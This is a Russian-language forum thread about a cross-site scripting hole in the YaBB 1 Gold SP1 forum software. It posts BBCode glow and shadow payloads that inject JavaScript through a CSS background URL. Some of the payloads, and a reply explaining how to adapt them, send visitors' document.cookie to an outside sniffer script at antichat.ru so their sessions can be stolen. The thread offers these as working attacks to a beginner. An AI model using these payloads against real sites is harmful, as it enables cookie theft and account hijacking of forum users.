![]() |
Уязвимость, YaBB 1 Gold - SP1, XSS атака.
Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]Код:
[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]Код:
[glow=red);background:url(javascript:img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,300]Big Exploit[/glow] |
Так. Ну это алерт, а тебе нужно, чтобы приходили куки на сниффер, да? Ну тогда подумай головой=)) Нужно вместо
Код HTML:
alert(document.cookie)Код HTML:
document.location.href='http://antichat.ru/cgi-bin/s.jpg?'+document.cookieНе забываем про РЕПУТАЦИЮ! Цитата:
И не надо изподтишка сообщение редактировать, ок? Я ответил на вопрос, уже новым сообщением пиши, а не редактируй старое! |
Да спасиб, но проблемма в том что, нет знаний в этой области, вот токо начал изучать.. ща попробую что нить.. Спасиб
|
Romaxa55 Всегда пожалуйста=)
|
Думаю тема закрыта, еще раз спасибо FQziT
|
| Время: 22:06 |